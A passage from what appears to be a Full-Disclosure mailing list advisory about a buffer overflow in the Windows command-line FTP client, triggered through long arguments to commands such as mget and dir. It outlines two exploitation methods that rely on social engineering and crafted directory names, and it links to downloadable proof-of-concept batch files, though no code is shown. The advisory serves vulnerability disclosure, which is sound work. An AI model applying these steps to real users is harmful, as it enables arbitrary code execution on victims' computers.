POC or specially crafted packets, ftp client will
crash possible arbitrary code execution in contest of
logged in user. This vulnerability is hard to exploit
since it requires social engineering and shellcode has
to be injected as argument in vulnerable commands. 

The vulnerability is caused due to an error in the
Windows FTP client in validating commands like mget,
dir, user, password and ls

Exploitation method:

Method 1:
-Send POC with payload to user.
-Social engineer victim to open it.

Method 2:
-Attacker creates a directory with long folder or
filename in his FTP server (should be other than IIS
server)
-Persuade victim to run the command mget, ls or
dir  on specially crafted folder using microsoft ftp
client
-FTP client will crash and payload will get executed


Proof Of Concept:
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt

Note: Modify POC to connect to lab FTP Server
  (As of now it will connect to
ftp://xdisclose.com)

Demonstration:
Note: Demonstration leads to crashing of Microsoft FTP
Client

Download POC rename to .bat file and execute anyone of
the batch file
http://www.xdisclose.com/poc/mget.bat.txt
http://www.xdisclose.com/poc/username.bat.txt
http://www.xdisclose.com/poc/directory.bat.txt
http://www.xdisclose.com/poc/list.bat.txt


Solution:
No Solution

Screenshot:
http://www.xdisclose.com/images/msftpbof.jpg


Impact:
Successful exploitation may allows execution of
arbitrary code with privilege of currently logged in
user.

Impact of the vulnerability is system level.


Original Advisory:
http://www.xdisclose.com/advisory/XD100096.html

Credits:
Rajesh Sethumadhavan has been credited with the
discovery of this vulnerability


Disclaimer:
This entire document is strictly for educational,
testing and demonstrating purpose only. Modification
use and/or publishing this information is entirely on
your own risk. The exploit code/Proof Of Concept is to
be used on test environment only. I am not liable for
any direct or indirect damages caused as a result of
using the information or demonstrations provided in
any part of this advisory.



  

Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/